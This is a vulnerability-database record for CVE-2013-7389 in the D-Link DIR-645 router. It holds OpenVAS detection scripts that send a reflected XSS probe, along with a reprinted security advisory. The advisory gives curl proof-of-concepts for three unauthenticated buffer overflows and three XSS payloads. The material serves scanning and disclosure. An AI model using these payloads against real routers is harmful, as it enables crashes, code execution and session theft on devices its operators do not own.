value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher,\n For updates refer to http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\n\n Impact Level: Application\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = \"\";\nreq = \"\";\nres = \"\";\nbanner = \"\";\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "type": "openvas", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-09-05T11:40:12"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-7389"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9ffbef4a82041cfbc7d4a3980fc8558f3949e04e16bd2c35a88eafebb8c52ddd", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "2ee4de483fa75a0bab48d47ff3167169", "key": "sourceData"}, {"hash": "187a8f7ee1c6a893ef3cbf34f41753dd", "key": "pluginID"}, {"hash": "71bc5ce2c6c2082eec188cd6e47cddff", "key": "modified"}, {"hash": "226057bac873999c3872aa502a5919bf", "key": "description"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "4cfeac0bf36a37570d558e060c9fe24a", "key": "href"}, {"hash": "974aeb74ca6ca783c94853e67d0440ff", "key": "published"}, {"hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31", "key": "reporter"}, {"hash": "1ea4472ec0174fcbd5b919692fc5bf4b", "key": "cvelist"}, {"hash": "eb878f6ac90271b6f96dde9ea52a9763", "key": "title"}, {"hash": "26e5f0ae9a9004e819cbc9ae7cb19d8b", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "id": "OPENVAS:1361412562310803730", "lastseen": "2018-09-01T23:57:12", "modified": "2018-08-22T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803730", "published": "2013-08-05T00:00:00", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 11082 2018-08-22 15:05:47Z mmartin $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 11082 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-22 17:05:47 +0200 (Wed, 22 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher,\n For updates refer to http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\n\n Impact Level: Application\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = \"\";\nreq = \"\";\nres = \"\";\nbanner = \"\";\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\n## Send and Receive the response\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:57:12"}], "edition": 11, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "1ea4472ec0174fcbd5b919692fc5bf4b"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "description", "hash": "226057bac873999c3872aa502a5919bf"}, {"key": "href", "hash": "4cfeac0bf36a37570d558e060c9fe24a"}, {"key": "modified", "hash": "8be90a922e3fddc17514b9fd17f39e9b"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "187a8f7ee1c6a893ef3cbf34f41753dd"}, {"key": "published", "hash": "974aeb74ca6ca783c94853e67d0440ff"}, {"key": "references", "hash": "75c9e4b5d012a2b804fc5029d35dffc0"}, {"key": "reporter", "hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31"}, {"key": "sourceData", "hash": "d149f5e5ce709fbaefea88324756b854"}, {"key": "title", "hash": "eb878f6ac90271b6f96dde9ea52a9763"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "8b107fff0eb6c1bdcfa11441b59468e62add3e3a162ed6e010a8a75e6a3700b5", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-7389"]}, {"type": "exploitdb", "idList": ["EDB-ID:27283"]}], "modified": "2019-05-29T18:38:15"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-05-29T18:38:15"}, "vulnersScore": 7.0}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310803730", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:07", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.", "modified": "2016-12-31T02:59:00", "id": "CVE-2013-7389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7389", "published": "2014-07-07T14:55:00", "title": "CVE-2013-7389", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T05:31:36", "bulletinFamily": "exploit", "description": "D-Link DIR-645 1.03B08 - Multiple Vulnerabilities. CVE-2013-7389. Webapps exploit for hardware platform", "modified": "2013-08-02T00:00:00", "published": "2013-08-02T00:00:00", "id": "EDB-ID:27283", "href": "https://www.exploit-db.com/exploits/27283/", "type": "exploitdb", "title": "D-Link DIR-645 1.03B08 - Multiple Vulnerabilities", "sourceData": "Multiple vulnerabilities on D-Link DIR-645 devices\r\n==================================================\r\n\r\n[ADVISORY INFORMATION]\r\nTitle: Multiple vulnerabilities on D-Link DIR-645 devices\r\nDiscovery date: 06/03/2013\r\nRelease date: 02/08/2013\r\nAdvisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\r\nCredits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)\r\n\r\n[AFFECTED PRODUCTS]\r\nThis security vulnerability affects the following products and firmware\r\nversions:\r\n * D-Link DIR-645, 1.03B08\r\nOther products and firmware versions could also be vulnerable, but they were\r\nnot checked.\r\n\r\n[VULNERABILITY DETAILS]\r\nThis router model is affected by multiple security vulnerabilities. All of them\r\nare exploitable by remote, unauthenticated attackers. Details are outlined in\r\nthe following, including some proof-of-concepts.\r\n\r\n1. Buffer overflow on \"post_login.xml\"\r\n \r\n Invoking the \"post_login.xml\" server-side script, attackers can specify a\r\n \"hash\" password value that is used to authenticate the user. This hash value\r\n is eventually processed by the \"/usr/sbin/widget\" local binary. However, the\r\n latter copies the user-controlled hash into a statically-allocated buffer,\r\n allowing attackers to overwrite adjacent memory locations.\r\n\r\n As a proof-of-concept, the following URL allows attackers to control the\r\n return value saved on the stack (the vulnerability is triggered when\r\n executing \"/usr/sbin/widget\"):\r\n\r\n curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB\r\n\r\n The value of the \"hash\" HTTP GET parameter consists in 292 occurrences of\r\n the 'A' character, followed by four occurrences of character 'B'. In our lab\r\n setup, characters 'B' overwrite the saved program counter (%ra).\r\n\r\n\r\n2. Buffer overflow on \"hedwig.cgi\"\r\n\r\n Another buffer overflow affects the \"hedwig.cgi\" CGI script. Unauthenticated\r\n remote attackers can invoke this CGI with an overly-long cookie value that\r\n can overflow a program buffer and overwrite the saved program address.\r\n\r\n Proof-of-concept:\r\n curl -b uid=$(perl -e 'print \"A\"x1400;') -d 'test' http://<target ip>/hedwig.cgi\r\n\r\n\r\n3. Buffer overflow on \"authentication.cgi\"\r\n\r\n The third buffer overflow vulnerability affects the \"authentication.cgi\" CGI\r\n script. This time the issue affects the HTTP POST paramter named\r\n \"password\". Again, this vulnerability can be abused to achieve remote code\r\n execution. As for all the previous issues, no authentication is required.\r\n\r\n Proof-of-concept:\r\n curl -b uid=test -d $(perl -e 'print \"uid=test&password=asd\" . \"A\"x2024;') http://<target ip>/authentication.cgi\r\n\r\n\r\n4. Cross-site scripting on \"bind.php\"\r\n\r\n Proof-of-concept:\r\n curl \"http://<target ip>/parentalcontrols/bind.php?deviceid=test'\\\"/><script>alert(1)</script><\"\r\n\r\n\r\n5. Cross-site scripting on \"info.php\"\r\n\r\n Proof-of-concept:\r\n curl \"http://<target ip>/info.php?RESULT=testme\\\", msgArray); alert(1); //\"\r\n\r\n\r\n6. Cross-site scripting on \"bsc_sms_send.php\"\r\n\r\n Proof-of-concept:\r\n curl \"http://<target ip>/bsc_sms_send.php?receiver=testme\\\"/><script>alert(1);</script><div\"\r\n\r\n\r\n[REMEDIATION]\r\nD-Link has released an updated firmware version (1.04) that addresses this\r\nissue. The firmware is already available on D-Link web site, at the following\r\nURL:\r\nhttp://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\r\n\r\n[DISCLAIMER]\r\nThe author is not responsible for the misuse of the information provided in\r\nthis security advisory. The advisory is a service to the professional security\r\ncommunity. There are NO WARRANTIES with regard to this information. Any\r\napplication or distribution of this information constitutes acceptance AS IS,\r\nat the user's own risk. This information is subject to change without notice.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/27283/"}]}